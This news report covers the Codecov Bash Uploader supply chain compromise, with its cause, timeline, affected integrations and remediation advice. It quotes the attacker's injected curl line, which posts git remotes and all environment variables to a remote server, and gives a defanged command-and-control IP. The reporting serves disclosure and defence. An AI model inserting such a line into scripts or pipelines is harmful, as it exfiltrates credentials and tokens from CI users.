Hacked Codecov uploading script leaked creds for two months

A malicious alteration to a shell script lay undetected since January this year at software testing coverage report provider Codecov, sparking fears of another significant supply chain attack.

Forensic analysis shows that an unknown threat actor exploited an error in Codecov's Docker container image creation process, and gained access to the credential that allowed the modification to the company's Bash Uploader script.

Codecov said a Google Cloud Storage key was accessed starting January 31 this year, and not secured until April 1 US time.

The script is normally used to upload coverage reports to Codecov, but it was altered to transmit the UNIX shell environment, which can be used to store variables.

A threat actor changed one part of the Bash Uploader script to:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:///upload/v2 || true

Codecov said the hacked script could potentially send any credentials, tokens and keys that customers were passing through their continuous integration runners.

This, in turn, could expose services, data stores and application code that can be accessed with the credentials, tokens or keys, Codecov said.

Git links of the origin repository that was used to upload coverage reports is also among the information potentially accessed.

The server receiving the data was hosted on cloud infrastructure provider Digital Ocean.

Security researchers noted that the hack potentially affected a large number of important software projects.

Codecov Hack

Many projects affected, see https://t.co/FoUo4UFiDP

C2 IP
104[.]248[.]94[.]23
�� check your logs

YARA Rulehttps://t.co/0if3TAZu8k
(that's how I've found it - in a VT Retrohunt)

Malicious shell scripthttps://t.co/svNSZUHS6r pic.twitter.com/4cpqfE4vsM

— Florian Roth (@cyb3rops) April 16, 2021

The Bash uploader is also used in other scripts, such as codecov-actions for Github, codecov for CircleCI Orb and Codecov Bitrise step.

The self-hosted version of Codecov is unlikely to be affected, unless users' CI pipeline is configured to fetch the Bash Uploader.

Codecov is advising users to immediately invalidate existing credentials, tokens and keys that are stored in their environment variables, and to generate new ones.

It is possible to review what's stored in the environment by running the "env" command in the CI pipelines.

The company said it has rotated all credentials, including the key that was captured by the attackers, and set up monitoring and auditing to ensure that the Bash Uploader cannot be compromised like this again. 

Codecov has also reported the incident to federal police in the United States, and the webserver used by the attackers will be properly decommissioned and auditable to glean further information from it.

The supply chain attack comes just two weeks after another significant issue was discovered affecting the popular PHP language repository that saw two malicious commits with backdoors being injected into its source code.